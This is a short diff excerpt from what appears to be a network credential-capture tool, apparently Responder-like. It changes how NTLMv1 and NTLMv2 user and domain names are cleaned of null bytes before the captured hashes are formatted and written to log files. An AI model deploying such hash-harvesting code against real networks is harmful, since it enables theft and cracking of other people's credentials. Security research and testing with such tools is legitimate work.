| skipped 178 lines |
179 | 179 | | NtHash = codecs.encode(SSPIStart[NthashOffset:NthashOffset+NthashLen],"hex").upper() |
180 | 180 | | DomainLen = struct.unpack('<H',data[30:32])[0] |
181 | 181 | | DomainOffset = struct.unpack('<H',data[32:34])[0] |
182 | | - | Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].strip(b"\x00") |
| 182 | + | Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace(b"\x00",b"") |
183 | 183 | | UserLen = struct.unpack('<H',data[38:40])[0] |
184 | 184 | | UserOffset = struct.unpack('<H',data[40:42])[0] |
185 | | - | User = SSPIStart[UserOffset:UserOffset+UserLen].strip(b"\x00") |
| 185 | + | User = SSPIStart[UserOffset:UserOffset+UserLen].replace(b"\x00",b"") |
186 | 186 | | writehash = '%s::%s:%s:%s:%s' % (User.decode('latin-1'),Domain.decode('latin-1'), LMHash.decode('latin-1'), NtHash.decode('latin-1'), Challenge.decode('latin-1')) |
187 | 187 | | WriteData("logs/NTLMv1.txt", writehash, User) |
188 | 188 | | return "NTLMv1 complete hash is: %s\n"%(writehash), User.decode('latin-1')+"::"+Domain.decode('latin-1') |
| skipped 2 lines |
191 | 191 | | NtHash = codecs.encode(SSPIStart[NthashOffset:NthashOffset+NthashLen],"hex").upper() |
192 | 192 | | DomainLen = struct.unpack('<H',data[30:32])[0] |
193 | 193 | | DomainOffset = struct.unpack('<H',data[32:34])[0] |
194 | | - | Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].strip(b"\x00") |
| 194 | + | Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace(b"\x00",b"") |
195 | 195 | | UserLen = struct.unpack('<H',data[38:40])[0] |
196 | 196 | | UserOffset = struct.unpack('<H',data[40:42])[0] |
197 | | - | User = SSPIStart[UserOffset:UserOffset+UserLen].strip(b"\x00") |
| 197 | + | User = SSPIStart[UserOffset:UserOffset+UserLen].replace(b"\x00",b"") |
198 | 198 | | writehash = '%s::%s:%s:%s:%s' % (User.decode('latin-1'),Domain.decode('latin-1'), Challenge.decode('latin-1'), NtHash[:32].decode('latin-1'), NtHash[32:].decode('latin-1')) |
199 | 199 | | WriteData("logs/NTLMv2.txt", writehash, User) |
200 | 200 | | return "NTLMv2 complete hash is: %s\n"%(writehash),User.decode('latin-1')+"::"+Domain.decode('latin-1') |
| skipped 607 lines |